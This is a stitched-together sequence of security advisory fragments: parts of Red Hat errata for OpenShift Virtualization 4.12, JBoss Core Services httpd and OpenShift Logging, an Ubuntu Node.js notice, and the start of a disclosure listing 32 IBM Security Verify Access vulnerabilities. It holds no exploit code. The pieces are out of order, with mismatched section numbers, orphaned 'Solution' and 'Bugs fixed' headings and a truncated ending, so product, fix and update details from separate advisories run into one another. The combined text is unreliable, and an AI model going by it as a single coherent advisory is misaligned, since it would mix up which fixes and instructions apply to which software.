References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-38561\nhttps://access.redhat.com/security/cve/CVE-2022-0759\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-30631\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. Summary:\n\nRed Hat OpenShift Virtualization release 4.12 is now available with updates\nto packages and images that fix several bugs and add enhancements. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. This release includes bug fixes,\nenhancements and component upgrades, which are documented in the Release\nNotes, linked to in the References. \n\nThe References section of this erratum contains a download link for the\nupdate. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n* expat: a use-after-free in the doContent function in xmlparse.c\n(CVE-2022-40674)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n* curl: HTTP proxy double-free (CVE-2022-42915)\n* curl: POST following PUT confusion (CVE-2022-32221)\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n* curl: control code in cookie denial of service (CVE-2022-35252)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n* curl: Unpreserved file permissions (CVE-2022-32207)\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n5. ==========================================================================\nUbuntu Security Notice USN-6457-1\nOctober 30, 2023\n\nnodejs vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Node.js. \n\nSoftware Description:\n- nodejs: An open-source, cross-platform JavaScript runtime environment. \n\nDetails:\n\nTavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a\nuser or an automated system were tricked into opening a specially crafted\ninput file, a remote attacker could possibly use this issue to cause a\ndenial of service. (CVE-2022-0778)\n\nElison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)\n\nChancen and Daniel Fiala discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2068)\n\nAlex Chernyakhovsky discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2097)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\n libnode-dev 12.22.9~dfsg-1ubuntu3.1\n libnode72 12.22.9~dfsg-1ubuntu3.1\n nodejs 12.22.9~dfsg-1ubuntu3.1\n nodejs-doc 12.22.9~dfsg-1ubuntu3.1\n\nIn general, a standard system update will make all the necessary changes. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly, for detailed release notes:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n## Advisory Information\n\nTitle: 32 vulnerabilities in IBM Security Verify Access\nAdvisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\nBlog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\nDate published: 2024-11-01\nVendors contacted: IBM\nRelease mode: Released\nCVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142\n\n\n\n## Product description\n\n\u003e IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. \n\u003e In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities. \n\u003e \n\u003e IBM Security Verify Access offers the following features:\n\u003e\n\u003e - Authentication\n\u003e\n\u003e Provides a wide range of built-in authenticators and supports external authenticators. \n\u003e \n\u003e - Authorization\n\u003e\n\u003e Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API. \n\u003e \n\u003e - Data security and centralized resource management\n\u003e\n\u003e Manages secure access to private internal network-based resources by using the public Internet\u0027s broad connectivity and ease of use with a corporate firewall system. \n\u003e\n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access\n\n\n\n## Vulnerability Summary\n\nVulnerable versions: IBM Security Verify Access \u003c 10.0.8. \n\nThe summary of the vulnerabilities is as follows:\n\n1. non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime\n2. CVE-2024-25027 - Reuse of snapshot private keys\n3. CVE-2023-30997 - Local Privilege Escalation using OpenLDAP\n4. CVE-2023-30998 - Local Privilege Escalation using rpm\n5. CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot\n5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections\n5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot\n5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell\n6. CVE-2023-43017 - PermitRootLogin set to yes\n8. CVE-2024-35137 and CVE-2024-35139 - Lack of password for the `cluster` user\n9. CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes\n10. CVE-2023-38369 - Hardcoded PKCS#12 files\n11. CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key\n12. non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n13. CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n14. CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n15. CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n16. CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime\n17. CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances\n18. CVE-2023-32327 - XML External Entity (XXE) in dscd\n19. CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n20. non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n21. CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration\n22. CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)\n23. non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n24. CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime\n25. CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp\n26. non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n27. non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n28. non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n29. non-assigned CVE vulnerability - Outdated \"IBM Crypto for C\" library\n30. non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities\n30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability\n30.2. libtivsec_yamlcpp.so - 4 CVEs\n30.3. libtivsec_xml4c.so - outdated Xerces-C library\n31. non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images\n32. non-assigned CVE vulnerability - Lack of privilege separation in Docker instances\n\nTL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nIBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities. \n\n_Miscellaneous notes_:\n\nThe vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be 